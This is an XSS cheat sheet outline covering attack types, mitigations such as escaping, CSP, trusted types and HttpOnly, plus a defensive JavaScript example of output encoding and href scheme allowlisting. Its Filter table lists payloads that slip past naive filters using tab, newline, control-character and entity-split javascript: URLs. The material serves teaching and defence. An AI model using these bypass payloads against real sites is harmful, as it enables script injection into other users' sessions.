XSS

Cross-site scripting (XSS) cheat sheet

  • Type
  • Self-XSS
  • Reflected XSS
  • Stored XSS
  • Mitigation
  • Filter

    Pattern        | Bypass
    [SPACE]on...=  | <TAB>onload=alert(1)>
    [SPACE]on...=  | \nonload=alert(1)>
    [SPACE]on...=  |
    javascript:    | <a href="\x01javascript:alert(1)">X</a>
    javascript:    | <a href="java\tscript:alert(1)">X</a>
    javascript:    | <a href="java&Tab;script:alert(1)">X</a>
    <script        | JSFuck
  • Escape (HTML Entity)

    Symbol | Alternative
    <      | &lt;
    >      | &gt;
    "      | &quot;
  • Content Security Policy (CSP) > CSP Evaluator

    • script-src
    • Nonce
  • trusted-types (Chrome)
  • HTTP response header
  • Define trusted resources
  • HttpOnly
  • Bypass
  • <base>
    • Changes the base URL of every relative URL on the page
  • Relative Path Overwrite (RPO)
  • Case Study
  • XS-Search abusing the Chrome XSS Auditor
  • Mutation XSS in Google Search
  • Breaking XSS mitigations via Script Gadgets
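The Filter and Escape (HTML Entity) sections above are the defensive core of the sheet: blocklist patterns miss whitespace, control-character and entity variants, while output encoding plus an allowlisted URL scheme does not. The following is an added JavaScript example, not code from the cheat sheet; escapeHtml, safeHref, renderLink and the placeholder base origin example.invalid are our own names.

```javascript
// Added example, not from the cheat sheet: output-side mitigation for the
// "Filter" and "Escape (HTML Entity)" sections. All names here are ours.

// HTML-entity escaping for text and double-quoted attribute context. The page
// lists <, > and "; & and ' are added so attribute values cannot be broken out
// of and entities present in input are not re-interpreted by the HTML parser.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Allowlist the href scheme instead of pattern-filtering the string. The WHATWG
// URL parser, like the browser, drops ASCII tab/newline anywhere and strips
// leading C0 control characters, so "java\tscript:" and "\x01javascript:"
// normalize to the javascript: scheme and are rejected. Relative links resolve
// against BASE (a placeholder origin); anything that is not http(s) becomes "#".
const BASE = "https://example.invalid/";

function safeHref(input) {
  let url;
  try {
    url = new URL(String(input), BASE);
  } catch {
    return "#";
  }
  return url.protocol === "http:" || url.protocol === "https:" ? url.href : "#";
}

// Build an anchor from an untrusted href and label. safeHref() runs on the raw
// (already decoded) value; escapeHtml() then encodes the result so the HTML
// parser never turns an entity such as &Tab; back into a tab on the way out.
function renderLink(href, label) {
  return `<a href="${escapeHtml(safeHref(href))}">${escapeHtml(label)}</a>`;
}
```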